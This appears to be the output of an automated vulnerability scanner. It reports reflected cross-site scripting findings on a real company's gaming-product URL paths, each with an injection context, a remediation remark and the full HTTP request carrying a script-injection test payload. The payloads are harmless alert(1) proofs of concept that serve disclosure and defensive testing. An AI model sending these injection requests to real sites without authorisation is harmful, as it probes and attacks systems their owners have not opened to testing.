HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d25f1</script><script>alert(1)</script>a5a40ce3aab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/controllersd25f1</script><script>alert(1)</script>a5a40ce3aab HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c73c"><script>alert(1)</script>eabb0c52e15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us3c73c"><script>alert(1)</script>eabb0c52e15/gaming/headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dffae</script><script>alert(1)</script>bb33a0b2354 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dffae</script><script>alert(1)</script>bb33a0b2354/gaming/headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28a2d</script><script>alert(1)</script>e5168f944a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming28a2d</script><script>alert(1)</script>e5168f944a8/headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18f3"><script>alert(1)</script>3b90babf6ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gamingc18f3"><script>alert(1)</script>3b90babf6ce/headsets HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac00</script><script>alert(1)</script>2797aa3dc6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/headsets3ac00</script><script>alert(1)</script>2797aa3dc6d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4207f"><script>alert(1)</script>e8b8e64d6fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/headsets4207f"><script>alert(1)</script>e8b8e64d6fb HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a09"><script>alert(1)</script>3bac443840f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us56a09"><script>alert(1)</script>3bac443840f/gaming/joysticks HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 812ba</script><script>alert(1)</script>5c334e9cb4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /812ba</script><script>alert(1)</script>5c334e9cb4c/gaming/joysticks HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4493"><script>alert(1)</script>feee1c79c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gamingb4493"><script>alert(1)</script>feee1c79c89/joysticks HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dff1f</script><script>alert(1)</script>b832fcb5d82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gamingdff1f</script><script>alert(1)</script>b832fcb5d82/joysticks HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e8e6</script><script>alert(1)</script>91e3416f6d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/joysticks2e8e6</script><script>alert(1)</script>91e3416f6d5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 239a1"><script>alert(1)</script>c27b60be077 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/joysticks239a1"><script>alert(1)</script>c27b60be077 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25242"><script>alert(1)</script>4f763d17153 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us25242"><script>alert(1)</script>4f763d17153/gaming/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d39d</script><script>alert(1)</script>61ccc999882 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5d39d</script><script>alert(1)</script>61ccc999882/gaming/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c9a</script><script>alert(1)</script>eeca0c45f25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming26c9a</script><script>alert(1)</script>eeca0c45f25/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574cb"><script>alert(1)</script>9b24430e837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming574cb"><script>alert(1)</script>9b24430e837/mice-keyboard-combos HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2013"><script>alert(1)</script>775925c2762 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/mice-keyboard-combosa2013"><script>alert(1)</script>775925c2762 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c88a1</script><script>alert(1)</script>a48a604aab7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/mice-keyboard-combosc88a1</script><script>alert(1)</script>a48a604aab7 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb42</script><script>alert(1)</script>24d168637af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beb42</script><script>alert(1)</script>24d168637af/gaming/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df64"><script>alert(1)</script>de5499a8ebf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us6df64"><script>alert(1)</script>de5499a8ebf/gaming/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6e0b"><script>alert(1)</script>79cef348dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gamingb6e0b"><script>alert(1)</script>79cef348dac/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88194</script><script>alert(1)</script>bb330791f95 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming88194</script><script>alert(1)</script>bb330791f95/other-accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec7c7</script><script>alert(1)</script>d90d3f07a82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming/other-accessoriesec7c7</script><script>alert(1)</script>d90d3f07a82 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5375"><script>alert(1)</script>ae3d85ebca4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gaming/other-accessoriesa5375"><script>alert(1)</script>ae3d85ebca4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb39"><script>alert(1)</script>290f48064f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us6bb39"><script>alert(1)</script>290f48064f6/gaming/wheels HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15b68</script><script>alert(1)</script>91c580c5eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /15b68</script><script>alert(1)</script>91c580c5eb/gaming/wheels HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37a20</script><script>alert(1)</script>324ffbebdf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/gaming37a20</script><script>alert(1)</script>324ffbebdf1/wheels HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5654"><script>alert(1)</script>0bbdff8aade was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/gamingb5654"><script>alert(1)</script>0bbdff8aade/wheels HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
